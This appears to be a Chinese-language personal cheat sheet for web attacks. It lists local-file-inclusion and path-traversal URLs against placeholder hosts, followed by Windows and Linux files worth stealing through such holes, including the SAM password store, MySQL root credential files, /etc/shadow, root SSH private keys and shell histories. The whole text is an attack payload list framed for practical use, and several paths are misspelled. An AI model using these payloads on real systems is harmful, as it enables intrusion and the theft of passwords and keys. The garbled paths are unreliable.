web总结(持续更新)

常见敏感文件

http://192.168.1.3/fileinclude/news.php?id=c:\\1.txt

www.test.com/test.php?test=../../../../../etc/passwod

www.test.com/test.php?test=/etc/shado

wwww.test.com/test.php?test=/etc/php5/apache2/php.ini

www.test.com/test.php?test=/etc/mysql/my.cnf

www.test.com/test.php?test=/etc/apache2/apache2.conf

---

windows敏感文件

c:\\boot.ini

查看系统版本



c:\\windows\\system32\\inetsrv\\metabase.xml

查看iis配置文件



c:\\windows\\repair\\sam

存储系统初次安装的密码



c:\\program files\\mysql\\my.ini

mysql配置文件



c:\\program files\\mysql\\data\\mysql\\user.myd

mysql root密码



c:\\windows\\php.ini

php配置信息



c:\\windows\\my.ini

mysql配置信息

linux敏感文件

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_ras.keystore

/root/.ssh/known_hosts

/etc/passwd

/etc/shadow

/etc/my.cnf

/etc/httpd/conf/httpd.conf

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]*(文件标识符)

/proc/mounts

/porc/config.gz